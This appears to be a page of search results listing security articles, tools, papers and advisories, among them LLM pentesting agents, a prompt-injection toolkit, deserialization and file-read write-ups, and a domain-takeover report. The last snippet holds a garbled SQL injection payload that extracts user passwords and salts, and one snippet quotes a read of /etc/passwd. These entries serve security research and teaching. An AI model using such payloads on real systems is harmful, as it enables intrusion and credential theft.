31 matches found
VibeHacking
👾 Welcome to Vibe Hacking By BlackPC, Vine & Foxxino Inc...
Black_Box-Penetration-Testing
BlackBox-Penetration-Testing Black-box penetration test again...
AutoPentest: Enhancing Vulnerability Management with Autonomous LLM Agents
A recent area of increasing research is the use of Large Language Models (LLMs) in penetration testing, which promises to reduce costs and thus allow for higher frequency. We conduct a review of related work, identifying best practices and common evaluation issues. We then present AutoPentest, an...
OET: Optimization-Based Prompt Injection Evaluation Toolkit
Large Language Models (LLMs) have demonstrated remarkable capabilities in natural language understanding and generation, enabling their widespread adoption across various domains. However, their susceptibility to prompt injection attacks poses significant security risks, as adversarial inputs can...
GHSA-86H2-2G4G-29QX avo possible unsafe reflection / partial DoS vulnerability
Summary The polymorphic field type stores the classes to operate on when updating a record with user input, and does not validate them in the back end. This can lead to unexpected behavior, remote code execution, or application crashes when viewing a manipulated record. Details After reviewing th...
What is an External Penetration Test?
A penetration test (also known as a pentest) is a security assessment that simulates the activities of real-world attackers to identify security holes in your IT systems or applications. The aim of the test is to understand what vulnerabilities you have, how they could be exploited, and what the...
Dynamic analysis of firmware components in IoT devices
Among the various offensive security techniques, vulnerability assessment takes priority when it comes to analyzing the security of IoT/IIoT devices. In most cases, such devices are analyzed using the black box testing approach, in which the researcher has virtually no knowledge about the object ...
Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware
CVE-2021-44228 (Apache Log4j Remote Code Execution) all log...
Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware
Join Community Telegram CVE-2021-4...
FormatFuzzer - A Framework For High-Efficiency, High-Quality Generation And Parsing Of Binary Inputs
FormatFuzzer is a framework for high-efficiency, high-quality generation and parsing of binary inputs. It takes a binary template that describes the format of a binary input and generates an executable that produces and parses the given binary format. From a binary template for GIF, for instance,...
The cloud is beige - The demise of black box testing
Black-box penetration testing is dead. I'd question why it is even a consideration. It's of limited and dubious value in almost any context. Wait, wait… I didn't mean that. Put down the pitchforks and torches, development and QA teams, I'm only talking about black-box penetration testing. Yes,...
vaeThink v1.0.1 code execution vulnerability mining analysis-vulnerability warning-the black bar safety net
0x01 Introduction This article records the process of discovering and auditing a code execution vulnerability in a niche CMS (vaeThink v1.0.1); the CMS is built on ThinkPHP5. As a beginner at code auditing, I also want to be able to practice and learn the process of recording an...
How to find and exploit deserialization vulnerabilities in .NET Remoting over HTTP-vulnerability warning-the black bar safety net
1. Overview In a recent security assessment at NCC Group, I found a .NET v2.0 application that uses .NET Remoting over HTTP to communicate with another server by sending SOAP requests. After decompiling the application, I realized that the server has TypeFilterLevel set to Full; this is very...
LightBulb Framework - Tools For Auditing WAFS
LightBulb is an open source Python framework for auditing web application firewalls and filters. Synopsis: The framework consists of two main algorithms: GOFA: An active learning algorithm that infers symbolic representations of automata in the standard membership/equivalence query model. Active...
Shopify: myshopify.com domain takeover
Hello Shopify Security Team, I just received your email and I'm sorry for any inconvenience. Yes, it was me. Basically, I just tried to audit your website using some black box testing. Unfortunately, I didn't read about those guidelines, such as creating a store on https://partners.shopify.com/ a...
CVE-2017-0199: in-depth analysis of the Microsoft Office RTF vulnerability-vulnerability warning-the black bar safety net
0x00 Preface Recently, researchers have again found a number of samples of the CVE-2017-0199 vulnerability. Although Microsoft released a patch for the vulnerability in April of this year, it is relatively simple to use, so worldwide usage is still very high; here to share some of the...
BFAC - Backup File Artifacts Checker
An automated tool that checks for backup artifacts that may disclose the web-application's source code.
An arbitrary file read vulnerability recorded-vulnerability warning-the black bar safety net
Black box testing: Black-box testing found that an interface has an arbitrary file read vulnerability. The first thing to determine is whether it is a file read or a file inclusion, because file_get_contents("/etc/passwd") and include("/etc/passwd") may behave the same from a black-box view. And the file inclusion is c...
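Wecenter latest version injection, part 2 (black-box testing tips)
Brief description: injection that ignores GPC. Details: set the user agent; the injection statement is ' andselect 1 fromselect count,concatselect concatpassword,0x23,salt,0x23 from awsusers limit 0,1,floorrand02x from informationschema.tables group by xa Then leave the page open for a few minutes and visit any page again; you can see that an error is reported: Database error ------ SQL: UPDATE awsusersonline SET uid = '2', lastactive ...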